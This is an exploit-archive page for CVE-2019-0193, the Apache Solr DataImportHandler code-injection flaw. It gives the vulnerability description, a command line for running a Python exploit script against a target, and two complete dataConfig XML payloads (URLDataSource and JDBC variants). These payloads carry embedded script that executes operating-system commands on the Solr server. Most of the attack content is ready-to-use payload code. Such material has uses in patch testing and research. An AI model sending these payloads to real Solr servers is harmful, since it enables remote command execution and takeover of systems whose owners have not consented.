Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-0193 PoC — Apache Solr 代码注入漏洞

Source
Associated Vulnerability
Title:Apache Solr 代码注入漏洞 (CVE-2019-0193)
Description:In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
Description
Apache Solr DataImport Handler RCE
Readme
# CVE-2019-0193  Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
![](./solr_RCE.gif)
![](./CVE-2019-0193.jpg)
### python usage

`python CVE-2019-0193.py http://192.168.2.18:8983 "calc"`

### URLDataSource_Poc

![](./python-CVE-2019-0193-poc.jpg)

```
<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("calc");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>
```

### jdbc


![](./python-CVE-2019-0193.jpg)

`D:\CVE\CVE-2019-0193\solr-7.7.2\server\solr-webapp\webapp\WEB-INF\lib\mysql-connector-java-5.1.48.jar`

```
<dataConfig>  
<dataSource name="fromMysql"
     type="JdbcDataSource"  
     driver="com.mysql.jdbc.Driver"  
     url="jdbc:mysql://localhost:3306/mysql"  
     user="root"  
     password="jas502n"/>
<script ><![CDATA[
   function poc(row) {
      var x=new java.lang.ProcessBuilder;x.command("notepad",'1.txt');org.apache.commons.io.IOUtils.toString(x.start().getInputStream());
     return row;
   }
   ]]>
 </script>  
<document>  
 <entity name="Jas502n" transformer="script:poc" query="SELECT 1">
 </entity>  
</document>  
</dataConfig>
```

### 参考链接:
https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA

https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA

File Snapshot

[4.0K] /data/pocs/7d46f63687f39b21a702dcc14d426847d66dfbda ├── [6.3M] CVE-2019-0193-Demo.mp4 ├── [687K] CVE-2019-0193.jpg ├── [4.1K] CVE-2019-0193.py ├── [557K] python-CVE-2019-0193.jpg ├── [649K] python-CVE-2019-0193-poc.jpg ├── [1.5K] README.md └── [2.2M] solr_RCE.gif 0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →